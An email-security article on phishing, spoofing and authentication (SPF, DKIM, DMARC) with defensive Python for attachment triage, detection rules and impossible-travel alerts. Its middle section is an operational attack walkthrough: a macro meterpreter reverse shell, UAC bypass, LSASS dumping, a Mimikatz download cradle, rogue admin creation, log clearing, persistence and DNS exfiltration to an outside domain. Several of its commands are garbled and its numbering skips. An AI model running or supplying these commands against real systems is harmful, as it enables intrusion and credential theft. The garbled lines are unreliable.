Email Security (Exploits, Vulnerabilities and Mitigation)
Email Security Risks in 2022
Over 60% of attacks arrive via e-mail and rely on file-less techniques such as LOLBAS abuse, phishing, drive-by downloads, and credential theft or account takeover.
If it hits your disks, it's too late.
1- Spoofing and Phishing
E-mail spoofing happens when a cybercriminal sends an e-mail to a user while masquerading as someone the user knows. Spoofing the sender address is easy to accomplish and extremely difficult to trace.
Phishing is another hazardous method used to mislead customers into handing cybercriminals personal data such as bank account or social security numbers. Cybercriminals often add pictures and trademarks so the message looks genuine and authentic, and they include a link that looks legitimate but leads to a fake website. As spoofing and phishing are two of cybercriminals' most common attack techniques, customers need to be informed about the anti-phishing solutions available to them.
2- Vulnerabilities in E-mail Security
Vulnerabilities in e-mail services caused by provider misconfigurations need to be identified. Attackers who exploit e-mail service vulnerabilities penetrate the target system, expose information, and make the system inaccessible.
3- Domain Squatting
Squatting is the registration, sale, or use of a domain name to profit from another party’s brand. As a consequence, companies and their customers may become targets for domain squatting and targeted spear phishing.
The channels of attack against Internet users are increasing every day. A single link carrying malicious content may be enough to compromise a computer. The security of every component of the e-mail service must be strengthened, and anti-phishing measures such as staff training and simulated e-mail threats must be introduced.
If a user receives malicious content via an e-mail attachment, the attacker may take over the whole computer system and network. Attached files must be examined with signature-based anti-virus and behavioral analysis to provide an effective defence against phishing.
Once a system is infected with ransomware, a ransom must be paid to unlock all encrypted data. The e-mail service must therefore be hardened, and the analysis services must be able to detect and block ransomware-specific behaviors.
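The attachment checks described above start with static triage before any signature or sandbox engine runs. The following Python script is an added example (my own code, not from the original page or any vendor product): it parses a raw message, extracts every attachment and flags executable extensions, a Windows PE header hiding behind a document extension, an Office document that carries a VBA project, and a PDF with script or launch actions. The .eml message, its three attachments, the extension lists and the finding labels are all constructed for this example.

```python
import io
import os
import zipfile
from email import message_from_bytes
from email.message import EmailMessage
from typing import Dict, List

# Extensions that should not arrive as plain attachments in most organisations (assumption: tune per policy).
EXECUTABLE_EXTS = {".exe", ".dll", ".scr", ".js", ".vbs", ".hta", ".ps1", ".bat", ".cmd", ".lnk"}
# OOXML formats are zip containers; a macro-enabled one carries a vbaProject.bin part.
OFFICE_ZIP_EXTS = {".docx", ".docm", ".dotm", ".xlsx", ".xlsm", ".pptx", ".pptm"}
# PDF name objects that introduce script or launch behaviour.
PDF_ACTIVE_MARKERS = (b"/JavaScript", b"/JS", b"/OpenAction", b"/Launch")


def triage_attachment(filename: str, data: bytes) -> List[str]:
    """Return the finding labels for one attachment (an empty list means nothing suspicious)."""
    findings = []
    ext = os.path.splitext(filename)[1].lower()
    if ext in EXECUTABLE_EXTS:
        findings.append("executable-extension")
    if data.startswith(b"MZ") and ext not in EXECUTABLE_EXTS:
        findings.append("pe-header-extension-mismatch")  # magic bytes say Windows PE, the name says otherwise
    if ext in OFFICE_ZIP_EXTS or data.startswith(b"PK"):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                if any(name.lower().endswith("vbaproject.bin") for name in zf.namelist()):
                    findings.append("office-macro-present")
        except zipfile.BadZipFile:
            findings.append("office-zip-malformed")
    if data.startswith(b"%PDF"):
        findings.extend("pdf-active-content:" + m.decode() for m in PDF_ACTIVE_MARKERS if m in data)
    return findings


def triage_message(raw: bytes) -> Dict[str, List[str]]:
    """Walk a raw RFC 5322 message and triage every part marked as an attachment."""
    report = {}
    for part in message_from_bytes(raw).walk():
        if part.get_content_disposition() != "attachment":
            continue
        name = part.get_filename() or "unnamed"
        report[name] = triage_attachment(name, part.get_payload(decode=True))
    return report


def build_macro_doc() -> bytes:
    """Constructed sample: a minimal OOXML-style zip that carries a vbaProject.bin part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/vbaProject.bin", b"\x00" * 16)  # only its presence matters for this check
    return buf.getvalue()


def build_sample_eml() -> bytes:
    """Constructed sample message with three attachments, so the example runs offline."""
    msg = EmailMessage()
    msg["From"] = "ceo@example.com"
    msg["To"] = "finance@example.com"
    msg["Subject"] = "Invoice"
    msg.set_content("Please review the attached invoice.")
    msg.add_attachment(build_macro_doc(), maintype="application", subtype="octet-stream",
                       filename="invoice.docm")
    msg.add_attachment(b"MZ\x90\x00" + b"\x00" * 60, maintype="application", subtype="pdf",
                       filename="statement.pdf")
    msg.add_attachment(b"%PDF-1.7\n1 0 obj << /OpenAction 2 0 R /JavaScript 3 0 R >> endobj",
                       maintype="application", subtype="pdf", filename="terms.pdf")
    return bytes(msg)


if __name__ == "__main__":
    for name, findings in triage_message(build_sample_eml()).items():
        print(f"{name}: {findings or 'clean'}")
```

The point of the magic-byte check is that an attachment's extension is attacker-controlled, so the triage trusts the first bytes of the payload over the filename; the macro check relies on the documented OOXML structure (a `vbaProject.bin` part inside the zip), which is why it also fires on a `.docx` that should never contain one.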
7- Configuration Errors
This is a pervasive security problem. A poorly configured e-mail service can cause serious trouble by allowing e-mail to be delivered without authentication.
For example, a cybercriminal with unauthenticated access to your e-mail service can send an arbitrary e-mail to one of your employees, and a cybercriminal who impersonates the CEO is all the more likely to succeed.
8- Browser Exploit Kit
E-mails that exploit known vulnerabilities in the web browser may lead to identity theft, data leakage, and loss of access. Sometimes a link leads to a page carrying exploit code. In this situation, protective measures must be taken by both the e-mail service and the security components.
9- Spear Phishing attacks and Business E-mail Compromise (BEC)
Another crucial problem is that a cyber thief who circumvents all technical security measures exploits the end user's ignorance to attack the system, because 97% of the world's population cannot recognize a sophisticated phishing e-mail. Users should therefore be regularly trained about these hazards via phishing tests, exams, surveys, and games.
10- File Format Exploits
Furthermore, file format vulnerabilities have become a major source of information security threats for a growing number of companies. Attackers who exploit these vulnerabilities craft malicious files that trigger application faults (such as buffer overflows). These vulnerabilities are critical because they frequently affect multiple platforms: for example, an attacker may create a single malicious PDF file that infects Windows, Macintosh, and Linux systems through one vulnerability in Adobe Acrobat's handling of the file format.
- There was a massive increase in ransomware and CryptoLockers at exactly the time that a lot of companies moved from on-premise Exchange to Office 365. Most on-premise Exchange deployments were very mature in terms of security and sat behind SEGs with mature technology, but a lot of companies moved to Office 365 without evaluating their need for e-mail security and simply enabled Microsoft's built-in security option for Office 365. This was a mistake: a lot of e-mail compromises were able to bypass the built-in Office 365 e-mail security, as Microsoft was not yet mature in that space.
- Attack Examples
- Attack Types
- Attack Glossary
Phishing E-mail Attachment Demo: File-less Attack using LOLBins and the Social-Engineer Toolkit
Here is a demo of building a file-less phishing e-mail attack using Kali Linux, Metasploit, the Social-Engineer Toolkit and LOLBin techniques (it creates macro attacks based on LOLBAS PowerShell bypass cradles).
File-less Word attachment Attack
--------- [UPDATE METASPL0IT]
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erdb > msfinstall && \chmod 755 msfinstall && \ ./msfinstall
---------
Unicorn - https://github.com/trustedsec/unicorn
git clone https://github.com/trustedsec/unicorn
---------
git clone https://github.com/trustedsec/unicorn
python unicorn.py windows/meterpreter/reverse_https [kali Ip address] 443 macro
sudo msfconsole -r unicorn.rc
---------
Copy macro powershell_attack.txt into Word attachment. Open Word / Developer / Macros / Create / Auto_Open / insert payload. https://www.techtoolsforwriters.com/how-to-add-a-macro-to-word/
---------
outlook.exe /PIM "CS2"
---------
sessions -i 1
load priv stdapi extapi
getuid
getsystem
background
use windows/local/bypassuac_sluihijack
set SESSION 1
exploit
getuid
getsystem
---------
execute -H -c -f "C:\\windows\\sysnative\\notepad.exe"
migrate 7584
shell
---------
whoami
ping -m 1 18.104.22.168
net1 group "Domain Admins" /domain
bitsadmin /transfer updates /download /priority normal https://urlzs.com/vMceQ C:\Users\Public\1.exe
cd C:\Users\Public\
REM - Above command downloads pd64.exe ProcessDump"
1.exe -accepteula -ma lsass.exe lsass.dmp
makecab "lsass.dmp" "2.cab" /L "c:\Users\public"
---------
Phishing File-less Attack (Java Rhino) Story
---------
sudo setoolkit 1 2 6 2 no 172.17.0.21 "kali IP" www.1password.com 1 2 7 1 443 1 2 21 y SET Output interact
---------
sessions 1
shell
whoami
systeminfo
ping -n 1 misdeppartment.com "FANCY BEAR"
ping -n 1 carbon2u.com "FANCY BEAR"
ping -n 1 adobeincorp.com "FANCY BEAR"
ping -n 1 gorodkoff.com "ZOOMBIE SPIDER"
ping west.ics-no.org "PUTTER PANDA"
ipconfig /all
wmic useraccount get /ALL
net user /add Trevor SmshBgr123
net localgroup administrator Trevor /add
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe -windowStyle Hidden -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient.DownloadString(' https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-MimiKatz -DumpCreds"
mshta https://secure.eicar.org.eicar.ps1
fsquirt.exe
tasklist /svc /FI "ImageName eq lsass*"
C:\Windows\system32\rundll32.exe c:\windows\System33\comsvcs.dll, MiniDump <LSASS PID> c:\lsass.dmp full
wevtutil cl System
wevtutil cl Security
wevtutil cl Setup
weveutil cl Application
exit
uoload /home/ect-user/backdoor,exe c:\\windows]\temp
shell
cd c:\windows]\temp
backdoor.exe
exit
run persistence -U -i 5 -p 443 -r 172.17.0.21
run post/windows/gather/arp_scanner RHOSTS=172.17.0.0/24
---------
background
user exploit/windows/local/wmi
set RHOSTS 172.17.0.280172.17.0.30
set SESSION 2
set smbUser demo
set SMBPass password
expolit
---------
Example
Living off the Land Exploits
https://lolbas-project.github.io/
https://threathunterplaybook.com/introduction.html
https://car.mitre.org/analytics/CAR-2019-04-003/
https://github.com/Arno0x/DNSExfiltrator
---------
git clone https://github.com/Arno0x/DNSExfiltrator.git
cd DNSExfiltrator
pip install -r requiremnets.txt
chmod 777 dnsexfiltrator.py
sudo ./dnsexfiltrator.py -d www.baconandcheese.com -p Steal1!
msfconsole
exploit (windows/smb/ms17_010_psexec) > run
mkdir C:\\Dell
mkdir C:\\Dell\\Drivers
mkdir C:\\Dell\\Drivers\\R01161974
upload /root/Desktop/DNSExfiltrator/dnsExfiltrator.js C:\\Dell\\Drivers\\R01161974
upload /root/Desktop/DNSExfiltrator/Invoke-DNSExfiltrator.ps1 C:\\Dell\\Drivers\\R01161974
upload /root/Desktop/DNSExfiltrator/dnsExfiltrator.exe C:\\Dell\\Drivers\\R01161974
upload /root/Desktop/DNSExfiltrator/dnsExfiltrator.dll C:\\Dell\\Drivers\\R01161974
shell
cscript.exe dnsExfiltrator.js "C:\Users\demo\Desktop\file.xls" wwww.beachandcheese.com Steal1!
load powhershell
powershell_execute "Import-Module C:\\Dell\\Drivers\\R01161974\\Invoke-DNSExfiltrator.ps1"
powershell_execute "Invoke-DNSExfiltrator -I C:\\Dell\\Drivers\\file.xls -d www.baconandcheese.com -p Steal1!"
---------
Reconnaissance:
whoami
net shares
net users
systeminfo findstr /B .C::Domain"
net localgroup administrators
net view
net group "Domain Admins" /domain
nltest /domain_trusts
powershell.(nslookup -q=txt http://owned.domain.com)[-1]
Disabling Firewall CMD :
"C:\Windows\system32\netsh.exe" Advfirewall set all profiles state off
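The detection side of the demos above is what a SOC actually needs from them: every step (the hidden PowerShell cradle spawned by Word, the LSASS minidump via comsvcs.dll or a renamed dump tool, the wevtutil log clearing, the netsh firewall change, the bitsadmin download) leaves a distinctive process command line. The following Python rule set is an added example (my own code, not part of the original walkthrough or any product): it runs a handful of regexes plus a parent/child check over constructed process-creation events and returns what fired. The rule names, the regexes, the sample events and the example.invalid URLs are all constructed for this example; production rules should be validated against your own telemetry.

```python
import re
from typing import Dict, List, Tuple

# Constructed rule set covering the living-off-the-land steps used in the demos. Tune before deploying.
RULES: List[Tuple[str, "re.Pattern"]] = [
    ("lsass-dump-comsvcs", re.compile(r"rundll32(\.exe)?.*comsvcs\.dll.*MiniDump", re.I)),
    ("lsass-dump-tool", re.compile(r"-ma\s+lsass(\.exe)?", re.I)),          # renamed ProcDump-style tools
    ("eventlog-cleared", re.compile(r"wevtutil(\.exe)?\s+cl\s", re.I)),
    ("firewall-disabled", re.compile(r"netsh(\.exe)?.*advfirewall.*state\s+off", re.I)),
    ("bitsadmin-download", re.compile(r"bitsadmin(\.exe)?.*/transfer.*https?://", re.I)),
    ("powershell-download-cradle",
     re.compile(r"powershell.*(hidden|bypass|-enc).*(DownloadString|IEX)", re.I)),
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Constructed process-creation events (parent image name, full command line of the new process).
EVENTS: List[Dict[str, str]] = [
    {"parent": "WINWORD.EXE", "cmdline": "powershell.exe -windowStyle Hidden -ExecutionPolicy Bypass "
     "-Command \"IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/x.ps1')\""},
    {"parent": "cmd.exe", "cmdline": r"C:\Windows\system32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 c:\lsass.dmp full"},
    {"parent": "cmd.exe", "cmdline": r"C:\Users\Public\1.exe -accepteula -ma lsass.exe lsass.dmp"},
    {"parent": "cmd.exe", "cmdline": "wevtutil cl Security"},
    {"parent": "explorer.exe", "cmdline": r'"C:\Windows\system32\netsh.exe" Advfirewall set allprofiles state off'},
    {"parent": "cmd.exe", "cmdline": r"bitsadmin /transfer updates /download /priority normal https://example.invalid/1.exe C:\Users\Public\1.exe"},
    {"parent": "svchost.exe", "cmdline": "wevtutil qe Security /c:5"},        # benign: query, not clear
    {"parent": "explorer.exe", "cmdline": r"notepad.exe C:\Users\demo\notes.txt"},
]


def image_name(cmdline: str) -> str:
    """Basename of the first token, quotes and directory stripped (enough for these samples)."""
    first = cmdline.strip().split()[0].strip('"')
    return first.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule that matches one event."""
    hits = [name for name, rx in RULES if rx.search(event["cmdline"])]
    # Parent/child rule: an Office application should not be launching a shell or script host.
    if event.get("parent", "").lower() in OFFICE_PARENTS and image_name(event["cmdline"]) in SCRIPT_HOSTS:
        hits.append("office-spawns-script-host")
    return hits


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Index and hit list for every event that triggered at least one rule."""
    flagged = []
    for i, ev in enumerate(events):
        hits = evaluate(ev)
        if hits:
            flagged.append((i, hits))
    return flagged


if __name__ == "__main__":
    for i, hits in scan(EVENTS):
        print(f"event {i}: {', '.join(hits)}")
```

The parent/child rule is the one that catches the phishing demo earliest, before any credential access happens; the command-line rules are deliberately tolerant of full paths and `.exe` suffixes because the demos themselves show both `wevtutil cl` and `C:\Windows\system32\rundll32.exe` forms.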
- Impossible travel: SaaS e-mail can be accessed from anywhere in the world, yet a single user account operated by a single human follows a pattern that is usually tied to one location and will not appear in two different geolocations at the same time. Detecting impossible travel between geolocations is therefore a good option.
- Checking phishing mail with SPF, DKIM, and DMARC.
- Sender Policy Framework (SPF) is an email authentication standard that allows domain owners to specify which servers are authorized to send email with their domain in the "Mail From:" email address. SPF allows receiving email systems to query DNS to retrieve the list of authorized servers for a given domain. If an email message arrives via an authorized server, the receiver can consider the email legitimate.
- Domain-based Message Authentication, Reporting & Conformance (DMARC) is an email authentication standard that works as a policy layer on top of SPF and DKIM. It helps receiving email systems recognize when an email is not coming from a company's approved domains, and it tells them how to safely dispose of unauthorized email.
- Brand Indicators for Message Identification (BIMI) is an email specification that works in conjunction with DMARC to enable companies to have their logos displayed next to their email messages in a recipient’s email client. Not only does this enhance brand visibility in crowded inboxes, it also verifies that the email is legitimate and comes from a trusted source.
- Adding DKIM, SPF, DMARC or BIMI to a single domain is relatively easy and takes just a few moments. Applying them across all the domains in an organization's entire email ecosystem, however, can quickly become complicated and costly. This is especially true when thousands of domains across numerous divisions and third-party email partners are involved at a large enterprise, which is why such organizations need a more comprehensive and automated solution.
- SPF, DKIM, and DMARC are email authentication protocols that are used to help prevent email fraud and protect email users from receiving fraudulent or malicious emails.
- ✔ SPF (Sender Policy Framework) is a protocol that allows an email receiver to verify that incoming mail from a domain is being sent from a server authorized by that domain’s administrators.
- – https://lnkd.in/dPYt32EW
- – https://lnkd.in/dmhVgm3K
- ✔ DKIM (DomainKeys Identified Mail) is another email authentication protocol that allows email receivers to verify that incoming email messages are authentic and have not been altered in transit. DKIM works by adding a digital signature to the email message header that is generated by the sending mail server.
- – https://lnkd.in/dp9SryfH
- – https://lnkd.in/duMSP-FA
- ✔ DMARC (Domain-based Message Authentication, Reporting & Conformance) is a protocol that builds on SPF and DKIM to provide better email authentication and protection against phishing and other email-based attacks. DMARC allows domain owners to specify how their emails should be handled if they fail SPF or DKIM checks.
- – https://lnkd.in/dp9SryfH
- – https://lnkd.in/duMSP-FA
- 🎁 For more on mail header investigation and analysis:
- ✔ Top free online phishing mail checkers – https://lnkd.in/dxXeDQbj
- ✔ Shortened URL check – https://lnkd.in/d3VS3trE
- ✔ Phishing email analysis – https://lnkd.in/dfscKs4n
- ✔ Basics of mail and header analysis – https://lnkd.in/dTBtd99R
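The impossible-travel item above describes a detection without showing the arithmetic behind it. The following Python script is an added example (my own code, not from the original page or any SaaS provider's product): it orders sign-in events per user, computes the great-circle distance between consecutive sign-ins with the haversine formula, derives the implied speed, and alerts when that speed exceeds what an airliner could achieve. The sample sign-ins, the 1000 km/h speed threshold and the 100 km minimum hop are constructed assumptions for this example; a real implementation takes the coordinates from the geo-IP enrichment of the provider's sign-in log.

```python
from datetime import datetime
from math import asin, cos, radians, sin, sqrt
from typing import Dict, List, Tuple

EARTH_RADIUS_KM = 6371.0
MAX_PLAUSIBLE_KMH = 1000.0   # assumption: nothing short of an airliner moves faster; tune per tenant
MIN_DISTANCE_KM = 100.0      # assumption: ignore small hops so geo-IP jitter inside one city does not alert

# Constructed sample SaaS sign-in events: (user, UTC timestamp, source IP, latitude, longitude, city).
SIGNINS: List[Tuple[str, str, str, float, float, str]] = [
    ("alice", "2022-03-01T08:00:00Z", "203.0.113.10", 51.5074,  -0.1278, "London"),
    ("alice", "2022-03-01T08:45:00Z", "203.0.113.11", 51.5074,  -0.1278, "London"),
    ("alice", "2022-03-01T09:30:00Z", "198.51.100.7", 40.7128, -74.0060, "New York"),
    ("bob",   "2022-03-01T09:00:00Z", "192.0.2.20",   48.8566,   2.3522, "Paris"),
    ("bob",   "2022-03-01T21:00:00Z", "192.0.2.21",   35.6762, 139.6503, "Tokyo"),
]


def haversine_km(lat1: float, lon1: float, lat2: float, lon2: float) -> float:
    """Great-circle distance between two points on a spherical Earth."""
    phi1, phi2 = radians(lat1), radians(lat2)
    a = sin(radians(lat2 - lat1) / 2) ** 2 + cos(phi1) * cos(phi2) * sin(radians(lon2 - lon1) / 2) ** 2
    return 2 * EARTH_RADIUS_KM * asin(sqrt(a))


def parse_ts(ts: str) -> datetime:
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))   # the 'Z' suffix is not accepted before 3.11


def detect_impossible_travel(events, max_kmh: float = MAX_PLAUSIBLE_KMH,
                             min_km: float = MIN_DISTANCE_KM) -> List[Dict]:
    """Compare each sign-in with the same user's previous one and alert when the implied speed is impossible."""
    alerts = []
    last: Dict[str, tuple] = {}
    for ev in sorted(events, key=lambda e: (e[0], e[1])):   # ISO-8601 UTC strings sort chronologically
        user, ts, ip, lat, lon, city = ev
        prev = last.get(user)
        if prev is not None:
            dist = haversine_km(prev[3], prev[4], lat, lon)
            hours = (parse_ts(ts) - parse_ts(prev[1])).total_seconds() / 3600.0
            speed = dist / hours if hours > 0 else float("inf")   # simultaneous sign-ins from far apart
            if dist >= min_km and speed > max_kmh:
                alerts.append({"user": user, "from": prev[5], "to": city, "from_ip": prev[2],
                               "to_ip": ip, "distance_km": round(dist), "speed_kmh": round(speed)})
        last[user] = ev
    return alerts


if __name__ == "__main__":
    for alert in detect_impossible_travel(SIGNINS):
        print(alert)
```

On the sample data alice's London to New York hop in 45 minutes implies roughly 7400 km/h and alerts, while bob's Paris to Tokyo hop over twelve hours (about 810 km/h) stays under the threshold, which is the distinction that keeps a frequent flyer from generating noise.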
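The SPF, DKIM and DMARC items above describe the checks in words; the following Python script is an added example (my own code, not from the original page or any mail-authentication product) that evaluates them on constructed records without touching DNS. It implements the ip4, ip6, include and all terms of an SPF record, parses a DMARC record, and combines the SPF result, an externally supplied DKIM result and identifier alignment into the DMARC disposition. The zones example.com, _spf.mailprovider.example and attacker.example, their records and the addresses are all constructed for this example; the organizational-domain helper is a simplification and a real receiver would use the Public Suffix List.

```python
import ipaddress
from typing import Dict, Optional

# Constructed DNS TXT records that stand in for live lookups (assumption: example zones only).
TXT_RECORDS: Dict[str, str] = {
    "example.com": "v=spf1 ip4:192.0.2.0/24 include:_spf.mailprovider.example -all",
    "_spf.mailprovider.example": "v=spf1 ip4:198.51.100.10 ip6:2001:db8::/32 ~all",
    "_dmarc.example.com": "v=DMARC1; p=reject; aspf=r; adkim=s; rua=mailto:dmarc@example.com",
    "attacker.example": "v=spf1 ip4:203.0.113.0/24 -all",   # the attacker's own, correctly published SPF
}
QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def check_spf(ip: str, domain: str, depth: int = 0) -> str:
    """SPF check of a connecting IP against the envelope-sender (Mail From) domain.
    Covers the ip4, ip6, include and all terms of RFC 7208; a, mx and exists need live DNS and are skipped."""
    if depth > 10:                      # RFC 7208 limits DNS-querying terms to 10 per check
        return "permerror"
    record = TXT_RECORDS.get(domain.lower())
    if record is None or not record.startswith("v=spf1"):
        return "none"
    addr = ipaddress.ip_address(ip)
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, arg = term.partition(":")
        if name in ("ip4", "ip6"):
            if addr in ipaddress.ip_network(arg, strict=False):   # mixed IP versions never match
                return QUALIFIERS[qualifier]
        elif name == "include":
            if check_spf(ip, arg, depth + 1) == "pass":
                return QUALIFIERS[qualifier]
        elif name == "all":
            return QUALIFIERS[qualifier]
    return "neutral"                    # record exhausted without an all term


def parse_dmarc(domain: str) -> Dict[str, str]:
    """Parse the _dmarc TXT record of a domain into tag/value pairs ({} if there is none)."""
    tags = {}
    for part in TXT_RECORDS.get("_dmarc." + domain.lower(), "").split(";"):
        key, _, value = part.strip().partition("=")
        if key:
            tags[key.strip()] = value.strip()
    return tags


def org_domain(domain: str) -> str:
    """Organizational domain. Assumption: the last two labels; production code uses the Public Suffix List."""
    return ".".join(domain.lower().split(".")[-2:])


def aligned(header_from: str, auth_domain: str, mode: str) -> bool:
    """DMARC identifier alignment: strict needs an exact match, relaxed the same organizational domain."""
    if mode == "s":
        return header_from.lower() == auth_domain.lower()
    return org_domain(header_from) == org_domain(auth_domain)


def dmarc_disposition(header_from: str, envelope_from: str, ip: str,
                      dkim_domain: Optional[str] = None, dkim_valid: bool = False) -> str:
    """Combine SPF, an externally computed DKIM verdict and alignment into the DMARC outcome:
    'pass', or the publisher's policy ('none', 'quarantine', 'reject') when no identifier aligns."""
    tags = parse_dmarc(header_from) or parse_dmarc(org_domain(header_from))
    if tags.get("v") != "DMARC1":
        return "none"
    spf_aligned = (check_spf(ip, envelope_from) == "pass"
                   and aligned(header_from, envelope_from, tags.get("aspf", "r")))
    dkim_aligned = (dkim_valid and dkim_domain is not None
                    and aligned(header_from, dkim_domain, tags.get("adkim", "s")))
    return "pass" if spf_aligned or dkim_aligned else tags.get("p", "none")


if __name__ == "__main__":
    print(dmarc_disposition("example.com", "example.com", "192.0.2.5"))          # pass
    print(dmarc_disposition("example.com", "example.com", "203.0.113.7"))        # reject
    print(dmarc_disposition("example.com", "attacker.example", "203.0.113.7"))   # reject
```

The third call is the case that explains why SPF alone is not enough: the attacker's own domain passes SPF perfectly well, but it does not align with the visible From: domain, so DMARC still applies the publisher's reject policy. The `adkim=s` tag in the constructed record likewise shows strict alignment rejecting a DKIM signature from `mail.example.com` that relaxed mode would accept.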